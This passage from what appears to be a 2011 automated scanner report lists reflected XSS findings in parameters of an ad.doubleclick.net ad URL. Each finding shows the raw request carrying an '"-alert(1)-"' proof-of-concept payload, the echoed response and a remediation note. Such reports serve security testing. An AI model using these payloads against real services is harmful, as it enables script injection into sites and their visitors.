Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
dlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=b9c36"-alert(1)-"b25cda93eb9&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium
...[SNIP]...

3.7. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [event parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26e3d"-alert(1)-"11d37b6a276 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=26e3d"-alert(1)-"11d37b6a276 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4872
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:22:40 GMT
Expires: Wed, 27 Apr 2011 23:22:40 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=26e3d"-alert(1)-"11d37b6a276http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo_Product_Media_2011");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
...[SNIP]...

3.8. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 524b6"-alert(1)-"8ae5f73bf70 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn524b6"-alert(1)-"8ae5f73bf70&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4872

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
/%2a/j%3B236574810%3B0-0%3B0%3B60245620%3B4307-300/250%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn524b6"-alert(1)-"8ae5f73bf70&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214
...[SNIP]...

3.9. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f578"-alert(1)-"41bdc1636cb was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US8f578"-alert(1)-"41bdc1636cb&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4877

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
0%3B1-0%3B0%3B60245620%3B4307-300/250%3B41437920/41455707/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US8f578"-alert(1)-"41bdc1636cb&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0G
...[SNIP]...

3.10. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [nd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45614"-alert(1)-"a1b1ccad763 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=2240845614"-alert(1)-"a1b1ccad763&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4872

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
307-300/250%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=2240845614"-alert(1)-"a1b1ccad763&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23
...[SNIP]...

3.11. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 651ea"-alert(1)-"2bbb3a752bd was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a651ea"-alert(1)-"2bbb3a752bd&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4872

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
7/16a/%2a/j%3B236574810%3B0-0%3B0%3B60245620%3B4307-300/250%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a651ea"-alert(1)-"2bbb3a752bd&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.19
...[SNIP]...

3.12. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [oepartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b433b"-alert(1)-"a8247191af was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=b433b"-alert(1)-"a8247191af&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4871

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=b433b"-alert(1)-"a8247191af&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&
...[SNIP]...

3.13. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [orh parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67e78"-alert(1)-"f7448d9e721 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com67e78"-alert(1)-"f7448d9e721&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com67e78"-alert(1)-"f7448d9e721&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source
...[SNIP]...

3.14. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97493"-alert(1)-"ee5fa11b092 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=297493"-alert(1)-"ee5fa11b092&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4877

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
/o%3B236574810%3B1-0%3B0%3B60245620%3B4307-300/250%3B41437920/41455707/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=297493"-alert(1)-"ee5fa11b092&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243
...[SNIP]...

3.15. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pdom parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12978"-alert(1)-"e22432d472d was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com12978"-alert(1)-"e22432d472d&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
07108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com12978"-alert(1)-"e22432d472d&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo
...[SNIP]...

3.16. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65cd9"-alert(1)-"c00625812dd was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ0865cd9"-alert(1)-"c00625812dd&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
